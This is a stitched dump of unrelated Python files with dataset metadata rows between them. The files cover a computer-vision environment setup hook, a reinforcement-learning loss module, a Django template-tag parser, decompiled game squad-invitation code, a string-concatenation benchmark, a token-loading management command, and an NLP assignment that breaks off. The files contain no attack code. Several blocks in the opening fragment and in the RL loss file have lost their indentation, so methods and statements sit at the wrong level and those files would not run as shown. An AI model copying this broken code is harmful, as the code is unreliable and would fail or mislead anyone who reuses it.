if int(cv2.__version__.split(".")[0]) >= 3:
cv2.ocl.setUseOpenCL(False)
except ImportError:
pass
_ENV_SETUP_DONE = False
def setup_environment():
    """Perform environment setup work.

    The default setup is a no-op, but the $FSDET_ENV_MODULE environment
    variable may name a Python source file or module whose
    setup_environment() performs custom, site-specific initialisation.
    Idempotent: only the first call does any work.
    """
    global _ENV_SETUP_DONE
    if _ENV_SETUP_DONE:
        return
    _ENV_SETUP_DONE = True

    _configure_libraries()

    custom_module_path = os.environ.get("FSDET_ENV_MODULE")
    if custom_module_path:
        setup_custom_environment(custom_module_path)
def setup_custom_environment(custom_module):
    """
    Import *custom_module* (a .py file path or an importable module name)
    and run the setup function it must expose as `setup_environment`.
    """
    if custom_module.endswith(".py"):
        env_module = _import_file("fsdet.utils.env.custom_module", custom_module)
    else:
        env_module = importlib.import_module(custom_module)
    setup_fn = getattr(env_module, "setup_environment", None)
    assert callable(setup_fn), (
        "Custom environment module defined in {} does not have the "
        "required callable attribute 'setup_environment'."
    ).format(custom_module)
    setup_fn()
| [
"masterkidster@gmail.com"
] | masterkidster@gmail.com |
61cfe6f18ab635a11a0e052d6d4160784fee45a5 | 22425a720986a746ddc2250295821023f53b74ef | /lanparty/lanparty_server/controllers/__init__.py | d50bf5c90bc29160f52f69bf9157f8ec52bbb0d6 | [] | no_license | thehellnet/lanparty-server | bd877ad4693e27434d340116af25a3d7f661aa68 | 2cd64e650fed92faf4e586f2fce5f9fb23822126 | refs/heads/master | 2020-04-08T18:48:47.958466 | 2019-05-17T13:22:24 | 2019-05-17T13:22:24 | 159,626,137 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19 | py | from . import tool
| [
"sardylan@gmail.com"
] | sardylan@gmail.com |
5d1c155d585d3b0a1036f0568b04008eafae631a | 5ccd63bc0a51f6cbf8431395e69d263b88c3434d | /agents/policy_gradient/modules/generalized_onpolicy_loss.py | f72276336ffbfb188fb8f2fe5c2ebb405446b09d | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | google-research/seed_rl | 12076a223365c700772e9e1ec5fdf6e6aa3dc67d | 0e1e0ac9178a670ad1e1463baed92020e88905ec | refs/heads/master | 2023-08-25T05:07:19.775923 | 2022-11-29T12:41:08 | 2022-11-29T12:41:08 | 215,027,338 | 818 | 164 | Apache-2.0 | 2023-01-16T11:48:01 | 2019-10-14T11:35:42 | Python | UTF-8 | Python | false | false | 11,465 | py | # coding=utf-8
# Copyright 2019 The SEED Authors
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements a generalized onpolicy loss."""
import abc
import inspect
import gin
from seed_rl.agents.policy_gradient.modules import logging_module
import tensorflow as tf
@gin.configurable
class GeneralizedOnPolicyLoss(tf.Module, logging_module.LoggingModule):
"""TensorFlow module implementing the generalized onpolicy loss."""
  def __init__(self, agent, reward_normalizer, parametric_action_distribution,
               advantage_estimator, policy_loss, discount_factor,
               regularizer=None, max_abs_reward=None,
               handle_abandoned_episodes_properly=True,
               huber_delta=None, value_ppo_style_clip_eps=None,
               baseline_cost=1., include_regularization_in_returns=False,
               frame_skip=1, reward_scaling=1.0):
    """Creates a GeneralizedOnPolicyLoss.

    Args:
      agent: network producing policy logits and a baseline value
        (called in compute_advantages()).
      reward_normalizer: optional; when set, value predictions are
        corrected/unnormalized through it in compute_advantages().
      parametric_action_distribution: maps policy logits to an action
        distribution, used for log-probs of the taken actions.
      advantage_estimator: advantage estimation module.
      policy_loss: policy loss module applied to the advantages.
      discount_factor: reward discount; stored here so submodules can share it.
      regularizer: optional policy regularizer; when
        include_regularization_in_returns is True its per-step rewards are
        added to the environment rewards.
      max_abs_reward: if not None, rewards are clipped to
        [-max_abs_reward, max_abs_reward].
      handle_abandoned_episodes_properly: if False, abandoned-episode flags
        are zeroed out and abandoned episodes are treated like ordinary ones.
      huber_delta: if not None, use a Huber value loss with this delta
        instead of mean squared error.
      value_ppo_style_clip_eps: epsilon for PPO-style value clipping —
        presumably disabled when None; used outside this snippet.
      baseline_cost: weight of the value-function loss term — stored here;
        applied outside this snippet.
      include_regularization_in_returns: whether regularization rewards are
        folded into the returns.
      frame_skip: environment frame skip — stored for use elsewhere.
      reward_scaling: multiplier applied to rewards after clipping.
    """
    self._agent = agent
    self._reward_normalizer = reward_normalizer
    self._parametric_action_distribution = parametric_action_distribution
    self._advantage_estimator = advantage_estimator
    self._policy_loss = policy_loss
    self._regularizer = regularizer
    self._max_abs_reward = max_abs_reward
    self._reward_scaling = reward_scaling
    self._baseline_cost = baseline_cost
    # Provided here so that it is shared.
    self._discount_factor = discount_factor
    self._frame_skip = frame_skip
    self._handle_abandoned_episodes_properly = handle_abandoned_episodes_properly
    self._value_ppo_style_clip_eps = value_ppo_style_clip_eps
    self._include_regularization_in_returns = include_regularization_in_returns
    if huber_delta is not None:
      self.v_loss_fn = tf.keras.losses.Huber(
          delta=huber_delta, reduction=tf.keras.losses.Reduction.NONE)
    else:
      self.v_loss_fn = tf.keras.losses.MeanSquaredError(
          reduction=tf.keras.losses.Reduction.NONE)
def init(self):
for module in self.submodules:
if hasattr(module, 'init'):
if not inspect.signature(module.init).parameters:
module.init()
def compute_advantages(self, agent_state, prev_actions, env_outputs,
agent_outputs, return_learner_outputs=False):
# Extract rewards and done information.
rewards, done, _, abandoned, _ = tf.nest.map_structure(lambda t: t[1:],
env_outputs)
if self._max_abs_reward is not None:
rewards = tf.clip_by_value(rewards, -self._max_abs_reward,
self._max_abs_reward)
rewards *= self._reward_scaling
# Compute the outputs of the neural networks on the learner.
learner_outputs, _ = self._agent((prev_actions, env_outputs),
agent_state,
unroll=True,
is_training=True)
# At this point, we have unroll length + 1 steps. The last step is only used
# as bootstrap value, so it's removed.
agent_outputs = tf.nest.map_structure(lambda t: t[:-1], agent_outputs)
learner_v = learner_outputs.baseline # current value function
learner_outputs = tf.nest.map_structure(lambda t: t[:-1], learner_outputs)
target_action_log_probs = self._parametric_action_distribution(
learner_outputs.policy_logits).log_prob(agent_outputs.action)
behaviour_action_log_probs = self._parametric_action_distribution(
agent_outputs.policy_logits).log_prob(agent_outputs.action)
# Compute the advantages.
if self._reward_normalizer:
corrected_predictions = self._reward_normalizer.correct_prediction(
learner_v)
unnormalized_predictions = self._reward_normalizer.unnormalize_prediction(
corrected_predictions)
else:
corrected_predictions = learner_v
unnormalized_predictions = learner_v
if not self._handle_abandoned_episodes_properly:
abandoned = tf.zeros_like(abandoned)
done_terminated = tf.logical_and(done, ~abandoned)
done_abandoned = tf.logical_and(done, abandoned)
if self._include_regularization_in_returns and self._regularizer:
additional_rewards, _ = self._regularizer(
self._parametric_action_distribution,
learner_outputs.policy_logits,
agent_outputs.policy_logits,
agent_outputs.action, with_logging=False)
assert rewards.shape == additional_rewards.shape
rewards += additional_rewards
# tf.math.pow does not work on TPU so we compute it manually.
adjusted_discount_factor = 1.
for _ in range(self._frame_skip):
adjusted_discount_factor *= self._discount_factor
vs, advantages = self._advantage_estimator(
unnormalized_predictions,
rewards, done_terminated,
done_abandoned,
adjusted_discount_factor,
target_action_log_probs,
behaviour_action_log_probs)
if self._reward_normalizer:
normalized_targets = self._reward_normalizer.normalize_target(vs)
normalized_advantages = self._reward_normalizer.normalize_advantage(
advantages)
self._reward_normalizer.update_normalization_statistics(vs)
else:
normalized_targets = vs
normalized_advantages = advantages
outputs = (normalized_targets, normalized_advantages)
if return_learner_outputs:
outputs += (learner_outputs,)
return outputs
def __call__(self, agent_state, prev_actions, env_outputs, agent_outputs,
normalized_targets=None, normalized_advantages=None):
"""Computes the loss."""
if normalized_targets is None:
normalized_targets, normalized_advantages, learner_outputs = \
self.compute_advantages(
agent_state, prev_actions, env_outputs, agent_outputs,
return_learner_outputs=True)
# The last timestep is only used for computing advantages so we
# remove it here.
agent_state, prev_actions, env_outputs, agent_outputs = \
tf.nest.map_structure(
lambda t: t[:-1],
(agent_state, prev_actions, env_outputs, agent_outputs))
else: # Advantages are already precomputed.
learner_outputs, _ = self._agent((prev_actions, env_outputs),
agent_state,
unroll=True,
is_training=True)
target_action_log_probs = self._parametric_action_distribution(
learner_outputs.policy_logits).log_prob(agent_outputs.action)
behaviour_action_log_probs = self._parametric_action_distribution(
agent_outputs.policy_logits).log_prob(agent_outputs.action)
# Compute the advantages.
if self._reward_normalizer:
corrected_predictions = self._reward_normalizer.correct_prediction(
learner_outputs.baseline)
old_corrected_predictions = self._reward_normalizer.correct_prediction(
agent_outputs.baseline)
else:
corrected_predictions = learner_outputs.baseline
old_corrected_predictions = agent_outputs.baseline
# Compute the advantage-based loss.
policy_loss = tf.reduce_mean(
self._policy_loss(
normalized_advantages,
target_action_log_probs,
behaviour_action_log_probs,
actions=agent_outputs.action,
target_logits=learner_outputs.policy_logits,
behaviour_logits=agent_outputs.policy_logits,
parametric_action_distribution=self._parametric_action_distribution)
)
# Value function loss
v_error = normalized_targets - corrected_predictions
self.log('GeneralizedOnPolicyLoss/V_error', v_error)
self.log('GeneralizedOnPolicyLoss/abs_V_error', tf.abs(v_error))
self.log('GeneralizedOnPolicyLoss/corrected_predictions',
corrected_predictions)
# Huber loss reduces the last dimension so we add a dummy one here.
normalized_targets = normalized_targets[..., tf.newaxis]
corrected_predictions = corrected_predictions[..., tf.newaxis]
v_loss = self.v_loss_fn(normalized_targets, corrected_predictions)
# PPO-style value loss clipping
if self._value_ppo_style_clip_eps is not None:
old_corrected_predictions = old_corrected_predictions[..., tf.newaxis]
clipped_corrected_predictions = tf.clip_by_value(
corrected_predictions,
old_corrected_predictions - self._value_ppo_style_clip_eps,
old_corrected_predictions + self._value_ppo_style_clip_eps)
clipped_v_loss = self.v_loss_fn(normalized_targets,
clipped_corrected_predictions)
v_loss = tf.maximum(v_loss, clipped_v_loss)
v_loss = tf.reduce_mean(v_loss)
# Compute the regularization loss.
if self._regularizer:
per_step_regularization, regularization_loss = self._regularizer(
self._parametric_action_distribution,
learner_outputs.policy_logits,
agent_outputs.policy_logits,
agent_outputs.action)
if not self._include_regularization_in_returns:
regularization_loss += tf.reduce_mean(per_step_regularization)
else:
regularization_loss = 0.
total_loss = policy_loss + self._baseline_cost*v_loss + regularization_loss
return total_loss
class PolicyLoss(tf.Module, metaclass=abc.ABCMeta):
  """Abstract base class for policy losses.

  NOTE(review): GeneralizedOnPolicyLoss also passes keyword extras
  (actions, target_logits, behaviour_logits,
  parametric_action_distribution) when invoking the loss, so concrete
  subclasses must accept them even though they are not part of this
  abstract signature.
  """

  @abc.abstractmethod
  def __call__(self, advantages, target_action_log_probs,
               behaviour_action_log_probs):
    r"""Computes policy loss.

    Args:
      advantages: A float32 tensor of shape [T, B] of advantages.
      target_action_log_probs: A float32 tensor of shape [T, B] with
        log-probabilities of taking the action by the current policy
      behaviour_action_log_probs: A float32 tensor of shape [T, B] with
        log-probabilities of taking the action by the behavioural policy

    Returns:
      A float32 tensor of shape [T, B] with the policy loss.
    """
    raise NotImplementedError('`__call__()` is not implemented!')
class RegularizationLoss(tf.Module, metaclass=abc.ABCMeta):
  """Abstract base class for regularization losses.

  (The original docstring said "policy losses" -- a copy-paste slip; this
  class defines the regularizer interface used by GeneralizedOnPolicyLoss.)
  """

  @abc.abstractmethod
  def __call__(self, parametric_action_distribution, target_action_logits,
               behaviour_action_logits, actions):
    r"""Computes regularization loss.

    Args:
      parametric_action_distribution: Parametric action distribution.
      target_action_logits: A float32 tensor of shape [T, B, A] with
        the logits of the target policy.
      behaviour_action_logits: A float32 tensor of shape [T, B, A] with
        the logits of the behavioural policy.
      actions: A float32 tensor of shape [T, B, A] with the actions taken by the
        behaviour policy.

    Returns:
      A float32 tensor of shape [T, B] with the regularization loss.

    NOTE(review): GeneralizedOnPolicyLoss unpacks the result as a pair
    (per_step_regularization, regularization_loss) and also passes a
    `with_logging` keyword in one call site -- concrete implementations
    must follow that contract, not the single-tensor return described
    above.
    """
    raise NotImplementedError('`__call__()` is not implemented!')
| [
"stanczyk@google.com"
] | stanczyk@google.com |
d7b781bab6353a104d0b726b33244a8255434f2b | d47cd584579452a8212a19ffee462f0c2e792a9c | /fluent_contents/utils/tagparsing.py | 0267274366501f593eb3eb2a955f356a98482d1c | [
"Apache-2.0"
] | permissive | kerin/django-fluent-contents | 9db6d397c3b5aeebc4691e3b8ad6f09fbbd50c41 | d760e7d1648f4583bdd8ba4c3078a3f5d9f544b4 | refs/heads/master | 2021-01-15T17:55:28.346869 | 2013-02-11T14:26:04 | 2013-02-11T14:26:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,421 | py | from django.template.base import TemplateSyntaxError, Token
import re
# Matches the leading "name=" part of a keyword-argument bit.
# Raw string avoids the invalid '\w' escape in a plain string literal
# (a DeprecationWarning on modern Python).
kwarg_re = re.compile(r'^(?P<name>\w+)=')
def parse_token_kwargs(parser, token, compile_args=False, compile_kwargs=False, allowed_kwargs=None):
    """
    Allow the template tag arguments to be like a normal Python function, with *args and **kwargs.

    Arguments:
        parser: the template parser, used to compile filter expressions.
        token: a template ``Token``, or an already-split list of bits.
        compile_args: if True, positional arguments are compiled to filter expressions.
        compile_kwargs: if True, keyword-argument values are compiled to filter expressions.
        allowed_kwargs: optional whitelist of keyword-argument names.

    Returns:
        An ``(args, kwargs)`` tuple.
    """
    if isinstance(token, Token):
        bits = token.split_contents()
    else:
        bits = token

    expect_kwarg = False
    args = []
    kwargs = {}
    prev_bit = None
    for bit in bits[1:]:
        match = kwarg_re.match(bit)
        if match:
            expect_kwarg = True
            # Split on the first '=' only, so a value that itself contains
            # '=' stays intact (the old maxsplit=2 crashed on such values).
            (name, expr) = bit.split('=', 1)
            # Keyword values are governed by compile_kwargs; the original
            # code accidentally tested compile_args here (and vice versa
            # for positional arguments below).
            kwargs[name] = parser.compile_filter(expr) if compile_kwargs else expr
        else:
            if expect_kwarg:
                raise TemplateSyntaxError("{0} tag may not have a non-keyword argument ({1}) after a keyword argument ({2}).".format(bits[0], bit, prev_bit))
            args.append(parser.compile_filter(bit) if compile_args else bit)
        prev_bit = bit

    # Validate the allowed arguments, to make things easier for template developers
    if allowed_kwargs is not None:
        for name in kwargs:
            if name not in allowed_kwargs:
                raise AttributeError("The option %s=... cannot be used in '%s'.\nPossible options are: %s." % (name, bits[0], ", ".join(allowed_kwargs)))
    return args, kwargs
| [
"vdboor@edoburu.nl"
] | vdboor@edoburu.nl |
4df8edf8fd0b18807fd1e09544c4b2f48e36594d | ec0b8bfe19b03e9c3bb13d9cfa9bd328fb9ca3f1 | /res/packages/scripts/scripts/client/gui/battle_control/arena_info/invitations.py | b1b060087fc9dc86befe5e49b3490250cc218ed0 | [] | no_license | webiumsk/WOT-0.9.20.0 | de3d7441c5d442f085c47a89fa58a83f1cd783f2 | 811cb4e1bca271372a1d837a268b6e0e915368bc | refs/heads/master | 2021-01-20T22:11:45.505844 | 2017-08-29T20:11:38 | 2017-08-29T20:11:38 | 101,803,045 | 0 | 1 | null | null | null | null | WINDOWS-1250 | Python | false | false | 10,226 | py | # 2017.08.29 21:44:26 Střední Evropa (letní čas)
# Embedded file name: scripts/client/gui/battle_control/arena_info/invitations.py
import BattleReplay
from adisp import process
from constants import PREBATTLE_TYPE, INVITATION_TYPE
from gui.battle_control.arena_info.settings import INVITATION_DELIVERY_STATUS
from gui.battle_control.requests.context import SendInvitesCtx
from gui.prb_control import prbInvitesProperty
from ids_generators import SequenceIDGenerator
from skeletons.gui.battle_session import ISquadInvitationsHandler
from unit_roster_config import SquadRoster
# Short alias for the delivery-status bit flags used throughout this module.
_STATUS = INVITATION_DELIVERY_STATUS
# Replay callback channel names used to record and re-play dyn-squad actions.
_SEND_ACTION_NAME = 'DynSquad.SendInvitationToSquad'
_ACCEPT_ACTION_NAME = 'DynSquad.AcceptInvitationToSquad'
_REJECT_ACTION_NAME = 'DynSquad.RejectInvitationToSquad'
class SquadInvitationsFilter(object):
    """Tracks squad invitations that are relevant to the current arena.

    Maintains accountDBID -> invite clientID maps for received and sent
    invites and translates raw invite events (added/changed/deleted) into
    INVITATION_DELIVERY_STATUS flag updates for the battle UI.
    """
    __slots__ = ('__arenaUniqueID', '__isReceivingProhibited', '__isSendingProhibited', '__received', '__sent')

    def __init__(self):
        super(SquadInvitationsFilter, self).__init__()
        self.__arenaUniqueID = 0
        # Whether the local player blocks in-battle invites / may not send.
        self.__isReceivingProhibited = False
        self.__isSendingProhibited = False
        # accountDBID -> invite clientID maps.
        self.__received = {}
        self.__sent = {}

    def setArenaUniqueID(self, arenaUniqueID):
        """Sets the arena that invites must belong to in order to be valid."""
        self.__arenaUniqueID = arenaUniqueID

    def isReceivingProhibited(self):
        """Returns True if the local player forbids in-battle invitations."""
        return self.__isReceivingProhibited

    def isSendingProhibited(self):
        """Returns True if the local player may not send invitations."""
        return self.__isSendingProhibited

    def updatePersonalInfo(self, arenaDP):
        """Refreshes the prohibited flags from the local player's arena info."""
        vInfoVO = arenaDP.getVehicleInfo()
        playerInfo = vInfoVO.player
        self.__isReceivingProhibited = playerInfo.forbidInBattleInvitations
        self.__isSendingProhibited = False
        if vInfoVO.isInSquad():
            if playerInfo.isPrebattleCreator:
                # The squad leader may invite only while there are free slots.
                count = arenaDP.getVehiclesCountInPrebattle(vInfoVO.team, vInfoVO.prebattleID)
                self.__isSendingProhibited = count >= SquadRoster.MAX_SLOTS
            else:
                # Ordinary squad members may never send invites.
                self.__isSendingProhibited = True

    def addReceivedInvite(self, invite):
        """Registers one received invite.

        Returns:
            Tuple (creator accountDBID, status flags to include);
            (0, NONE) if invite is None.
        """
        if invite is None:
            return (0, _STATUS.NONE)
        else:
            self.__received[invite.creatorDBID] = invite.clientID
            include = _STATUS.RECEIVED_FROM
            if not self.__isInviteValid(invite):
                include |= _STATUS.RECEIVED_INACTIVE
            return (invite.creatorDBID, include)

    def addSentInvite(self, invite):
        """Registers one sent invite; see addReceivedInvite.

        Returns:
            Tuple (receiver accountDBID, status flags to include);
            (0, NONE) if invite is None.
        """
        if invite is None:
            return (0, _STATUS.NONE)
        else:
            self.__sent[invite.receiverDBID] = invite.clientID
            include = _STATUS.SENT_TO
            if not self.__isInviteValid(invite):
                include |= _STATUS.SENT_INACTIVE
            return (invite.receiverDBID, include)

    def filterReceivedInvites(self, getter, added, changed, deleted):
        """Filters received invites.
        It's generator that returns item containing tuple(accountDBID, include, exclude).
        :param getter: function to get invite data.
        :param added: list of invites IDs that are added.
        :param changed: list of invites IDs that are changed.
        :param deleted: list of invites IDs that are deleted.
        """
        for clientID in added:
            invite = getter(clientID)
            if invite is None:
                continue
            if not self.__isInviteValid(invite):
                continue
            self.__received[invite.creatorDBID] = invite.clientID
            yield (invite.creatorDBID, _STATUS.RECEIVED_FROM, _STATUS.RECEIVED_INACTIVE)

        for clientID in changed:
            invite = getter(clientID)
            if invite is None:
                continue
            # A changed invite either became (or stayed) valid, or it turned
            # inactive; flip the corresponding flag.
            if self.__isInviteValid(invite):
                yield (invite.creatorDBID, _STATUS.RECEIVED_FROM, _STATUS.RECEIVED_INACTIVE)
            else:
                yield (invite.creatorDBID, _STATUS.RECEIVED_INACTIVE, _STATUS.NONE)

        # Invert clientID -> accountDBID to resolve deletions, which are
        # reported by clientID only.
        inverted = dict(zip(self.__received.values(), self.__received.keys()))
        for clientID in deleted:
            if clientID not in inverted:
                continue
            accountDBID = inverted[clientID]
            if self.__received.pop(accountDBID, None) is not None:
                yield (accountDBID, _STATUS.NONE, _STATUS.RECEIVED_FROM | _STATUS.RECEIVED_INACTIVE)

        return

    def filterSentInvites(self, getter, added, changed, deleted):
        """Filters sent invites.
        It's generator that returns item containing tuple(accountDBID, include, exclude).
        :param getter: function to get invite data.
        :param added: list of invites IDs that are added.
        :param changed: list of invites IDs that are changed.
        :param deleted: list of invites IDs that are deleted.
        """
        for clientID in added:
            invite = getter(clientID)
            if invite is None:
                continue
            if not self.__isInviteValid(invite):
                continue
            self.__sent[invite.receiverDBID] = invite.clientID
            yield (invite.receiverDBID, _STATUS.SENT_TO, _STATUS.SENT_INACTIVE)

        for clientID in changed:
            invite = getter(clientID)
            if invite is None:
                continue
            if self.__isInviteValid(invite):
                yield (invite.receiverDBID, _STATUS.SENT_TO, _STATUS.SENT_INACTIVE)
            else:
                yield (invite.receiverDBID, _STATUS.SENT_INACTIVE, _STATUS.NONE)

        # Resolve deletions (reported by clientID) back to accountDBIDs.
        inverted = dict(zip(self.__sent.values(), self.__sent.keys()))
        for clientID in deleted:
            if clientID not in inverted:
                continue
            accountDBID = inverted[clientID]
            if self.__sent.pop(accountDBID, None) is not None:
                yield (accountDBID, _STATUS.NONE, _STATUS.SENT_TO | _STATUS.SENT_INACTIVE)

        return

    def __isInviteValid(self, invite):
        # An invite counts only if it is an active squad invite for the
        # currently tracked arena.
        if invite.type != PREBATTLE_TYPE.SQUAD:
            return False
        if not invite.isSameBattle(self.__arenaUniqueID):
            return False
        if not invite.isActive():
            return False
        return True
class _SquadInvitationsHandler(ISquadInvitationsHandler):
    """Sends, accepts and rejects dynamic-squad invitations.

    Talks to the server through the battle session provider (for sending)
    and the prebattle invites controller (for accepting/declining).
    """
    __slots__ = ('__sessionProvider',)

    def __init__(self, setup):
        super(_SquadInvitationsHandler, self).__init__()
        self.__sessionProvider = setup.sessionProvider

    @prbInvitesProperty
    def prbInvites(self):
        # Injected by the prbInvitesProperty descriptor; this body is a stub.
        return None

    def clear(self):
        # Drop the session provider reference to break the cycle on shutdown.
        self.__sessionProvider = None
        return

    def send(self, playerID):
        """Sends a squad invite to the given account."""
        self.__onSendInviteToSquad(playerID)

    def accept(self, playerID):
        """Accepts the active incoming squad invite created by playerID."""
        inviteID = self.__getInviteID(playerID, True, True)
        if inviteID is not None:
            self.prbInvites.acceptInvite(inviteID)
        return

    def reject(self, playerID):
        """Declines the active incoming squad invite created by playerID."""
        inviteID = self.__getInviteID(playerID, True, True)
        if inviteID is not None:
            self.prbInvites.declineInvite(inviteID)
        return

    @process
    def __onSendInviteToSquad(self, playerID):
        # adisp coroutine: yields until the server request completes.
        yield self.__sessionProvider.sendRequest(SendInvitesCtx(databaseIDs=(playerID,)))

    def __getInviteID(self, playerID, isCreator, incomingInvites):
        """Finds the clientID of the active squad invite involving playerID.

        :param isCreator: match playerID against the invite creator (True)
            or its receiver (False).
        :param incomingInvites: search incoming (True) or outgoing invites.
        :return: the invite clientID, or None if no matching invite exists.
        """
        invites = self.prbInvites.getInvites(incoming=incomingInvites, onlyActive=True)
        if isCreator:

            def getter(item):
                return item.creatorDBID

        else:

            def getter(item):
                return item.receiverDBID

        for invite in invites:
            if invite.type == INVITATION_TYPE.SQUAD and getter(invite) == playerID:
                return invite.clientID

        return None
class _SquadInvitationsRecorder(_SquadInvitationsHandler):
    """ This class wraps _SquadInvitationsHandler in order to record player's
    actions with dyn squads during replay recording."""
    __slots__ = ('__idGen',)

    def __init__(self, setup):
        super(_SquadInvitationsRecorder, self).__init__(setup)
        # Sequential IDs make each recorded action unique in the replay file.
        self.__idGen = SequenceIDGenerator()

    def send(self, playerID):
        # Serialize the action into the replay before performing it.
        BattleReplay.g_replayCtrl.serializeCallbackData(_SEND_ACTION_NAME, (self.__idGen.next(), playerID))
        super(_SquadInvitationsRecorder, self).send(playerID)

    def accept(self, playerID):
        BattleReplay.g_replayCtrl.serializeCallbackData(_ACCEPT_ACTION_NAME, (self.__idGen.next(), playerID))
        super(_SquadInvitationsRecorder, self).accept(playerID)

    def reject(self, playerID):
        BattleReplay.g_replayCtrl.serializeCallbackData(_REJECT_ACTION_NAME, (self.__idGen.next(), playerID))
        super(_SquadInvitationsRecorder, self).reject(playerID)
class _SquadInvitationsPlayer(_SquadInvitationsHandler):
    """ This class wraps _SquadInvitationsHandler in order to simulate player's
    actions with dyn squads during replay."""
    __slots__ = ()

    def __init__(self, setup):
        super(_SquadInvitationsPlayer, self).__init__(setup)
        # Subscribe to the replay data channels recorded by
        # _SquadInvitationsRecorder so the actions are re-played.
        setCallback = BattleReplay.g_replayCtrl.setDataCallback
        for action, method in [(_SEND_ACTION_NAME, self.__onSend), (_ACCEPT_ACTION_NAME, self.__onAccept), (_REJECT_ACTION_NAME, self.__onReject)]:
            setCallback(action, method)

    def clear(self):
        # Unsubscribe from the replay channels before the base class clears.
        delCallback = BattleReplay.g_replayCtrl.delDataCallback
        for eventName, method in [(_SEND_ACTION_NAME, self.__onSend), (_ACCEPT_ACTION_NAME, self.__onAccept), (_REJECT_ACTION_NAME, self.__onReject)]:
            delCallback(eventName, method)
        super(_SquadInvitationsPlayer, self).clear()

    # Replay callbacks: the first argument is the recorded sequence ID,
    # which is not needed to repeat the action.
    def __onSend(self, _, playerID):
        self.send(playerID)

    def __onAccept(self, _, playerID):
        self.accept(playerID)

    def __onReject(self, _, playerID):
        self.reject(playerID)
def createInvitationsHandler(setup):
    """Creates the squad invitations handler matching the replay state.

    Replay playback gets the simulating player, replay recording gets the
    recording wrapper, and a live battle gets the plain handler.
    """
    if setup.isReplayPlaying:
        return _SquadInvitationsPlayer(setup)
    if setup.isReplayRecording:
        return _SquadInvitationsRecorder(setup)
    return _SquadInvitationsHandler(setup)
# okay decompyling c:\Users\PC\wotmods\files\originals\res\packages\scripts\scripts\client\gui\battle_control\arena_info\invitations.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.08.29 21:44:27 Střední Evropa (letní čas)
| [
"info@webium.sk"
] | info@webium.sk |
c0048d8b6c66c64ca5af65eba38528e645253d6b | a7625f86f3cc944b56f2862fad83e758d259baf9 | /chapter5/q20.py | 980149e8ec494ac30e3a62d6aa4ace021074f761 | [] | no_license | luke-mao/Data-Structures-and-Algorithms-in-Python | a517a2a87136002475489ee4c2924073daab4508 | a60ea0ccaa85bf4ca288736b3a55d5396213a408 | refs/heads/master | 2022-08-28T18:51:33.515450 | 2020-05-27T04:46:06 | 2020-05-27T04:46:06 | 264,062,695 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,487 | py | """
test 4 different methods to construct a long string
"""
import time
def method1(n):
    """Build a string of n 'a' characters via repeated string concatenation.

    Deliberately uses the naive concatenation strategy so it can be
    benchmarked against the join-based variants below.
    """
    result = ""
    for _ in range(n):
        result = result + "a"
    return result
def method2(n):
    """Build a string of n 'a' characters by appending to a list, then joining."""
    pieces = []
    for _ in range(n):
        pieces.append("a")
    joined = "".join(pieces)
    return joined
def method3(n):
    """Build a string of n 'a' characters by joining a list comprehension."""
    chars = ["a" for _ in range(n)]
    return "".join(chars)
def method4(n):
    """Build a string of n 'a' characters by joining a generator expression."""
    gen = ("a" for _ in range(n))
    return "".join(gen)
if __name__ == '__main__':
    # Benchmark sizes: 10^4 .. 10^7 characters.
    n_list = [10**4, 10**5, 10**6, 10**7]

    def _time_usec(method, n):
        """Return the wall-clock time of one method(n) call in microseconds."""
        start = time.time()
        result = method(n)
        elapsed = time.time() - start
        del result  # free the large string before the next measurement
        return int(elapsed * 10**6)

    # One list of timings per construction strategy, printed in order.
    # (This replaces four copy-pasted timing loops over m1..m4.)
    for method in (method1, method2, method3, method4):
        print([_time_usec(method, n) for n in n_list])

    # Observation: the string += method is definitely worse than the others;
    # the remaining three vary little and all appear to finish in O(n).
"55699548+luke-mao@users.noreply.github.com"
] | 55699548+luke-mao@users.noreply.github.com |
601dc711804496f547111d1d953946085dd3b498 | e07da133c4efa517e716af2bdf67a46f88a65b42 | /hub20/apps/ethereum_money/management/commands/load_tracked_tokens.py | 5701e391f3f536030bd13c896353e2c518edd93a | [
"MIT"
] | permissive | cryptobuks1/hub20 | be1da5f77a884f70068fd41edaa45d5e65b7c35e | 3a4d9cf16ed9d91495ac1a28c464ffb05e9f837b | refs/heads/master | 2022-04-19T21:26:15.386567 | 2020-04-19T07:17:47 | 2020-04-19T07:17:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 892 | py | import logging
from django.core.management.base import BaseCommand
from eth_utils import to_checksum_address
from hub20.apps.ethereum_money.app_settings import TRACKED_TOKENS
from hub20.apps.ethereum_money.models import EthereumToken
logger = logging.getLogger(__name__)
class Command(BaseCommand):
help = "Loads data relevant to all tokens that are going to be used by the instance"
def handle(self, *args, **options):
for token_address in TRACKED_TOKENS:
logger.info(f"Checking token {token_address}...")
try:
EthereumToken.make(to_checksum_address(token_address))
except OverflowError:
logger.error(f"{token_address} is not a valid address or not ERC20-compliant")
except Exception as exc:
logger.exception(f"Failed to load token data for {token_address}", exc_info=exc)
| [
"raphael@lullis.net"
] | raphael@lullis.net |
790e5e58745705e85b5e870e38166ed8d9fd690c | b1a38b9a4ede490f0c680ba5f7ee2eb9f689f35a | /assignment-2/best_friends.py | efbd7631751cf43e661feb33a34ac4cf46936a22 | [] | no_license | jencmart/mff-nlp1-npfl124 | e6e2836d57f40a5afe260694b422dfe5645e89bc | be913089f95fd9799c7576a2bc9c26f6a235d255 | refs/heads/master | 2023-03-12T11:14:01.930363 | 2021-03-06T10:31:03 | 2021-03-06T10:31:03 | 306,836,452 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,712 | py | import errno
import os
import numpy as np
from utils import *
def compute_counts(dataset, min_dist=1, max_dist=1, reverse=False):
    """Count unigrams and distance-limited word pairs in `dataset`.

    For every position idx, pairs (dataset[idx], dataset[j]) are counted
    for j in [idx + min_dist, idx + max_dist] and, if `reverse` is True,
    also for j in [idx - max_dist, idx - min_dist].

    Args:
        dataset: sequence of word tokens.
